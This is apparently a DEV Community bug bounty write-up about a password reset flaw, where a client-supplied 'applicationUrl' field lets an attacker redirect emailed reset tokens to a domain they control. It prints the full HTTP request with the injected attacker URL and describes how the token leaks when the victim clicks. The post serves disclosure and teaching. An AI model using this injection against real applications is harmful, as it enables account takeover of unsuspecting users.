DEV Community

Mohamed Zain
Mohamed Zain

Posted on

How I Earned $1000 from a Password Reset Vulnerability

#security #career #backend #tutorial

This is a minor but interesting vulnerability, Let me describe how it works in the password reset feature.
Password reset functionalities are among the most sensitive features in any web application. A small mistake in how the reset link is constructed can easily lead to account takeover vulnerabilities.
In this article, I will walk you through a real world vulnerability I found on involving a parameter called applicationUrl which allowed me to manipulate the password reset link and steal the reset token.
The backend accepted a parameter named applicationUrl which was supposed to define the base URL of the application.

The problem? the server trusted whatever value was given in this field.
This meant that I could inject any URL I wanted into the password reset link that gets emailed to the user.

When I submitted a password reset request, the following POST request was sent:

POST /server.php HTTP/1.1
Host: 1337.com
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
Origin: https://1337.com
Connection: close
Referer: https://1337/login.php
Cookie: /*cookie*/

D={"C":"Gpf_Rpc_Server","M":"run","requests":[{"C":"Gpf_Auth_Service","M":"requestNewPassword","fields":[["name","value"],["Id",""],["username","email@email.com"],["lost_pw_captcha","F3F3"],["applicationUrl","https://zayn1337.com/"]]}],"S":"dvkegseu3erupmvpkc6u3t7k7i"}
Enter fullscreen mode Exit fullscreen mode

I changed only one field: applicationUrl = https://zayn1337.com , the server didn’t reject it.
When the victim receives the password reset email, the link inside is expected to look like this:
https://1337.com/reset?token=XYZ
But because the server used my injected URL, the link became:
https://zayn1337.com/?token=XYZ

The token is still generated by the real application.
But it is sent to my domain because I control the applicationUrl parameter.
Once the victim clicks the link, their browser sends the token directly to my server.

Why This Happens?

The backend should never trust any user input when constructing a security sensitive URL.
In this case:
The password reset link was dynamically built using client supplied data.
No validation or whitelisting was performed.
Developers likely intended applicationUrl for customization, but accidentally exposed it to attackers


This vulnerability proves that small mistakes can create big security risks. I hope this writeup helps others.

Top comments (0)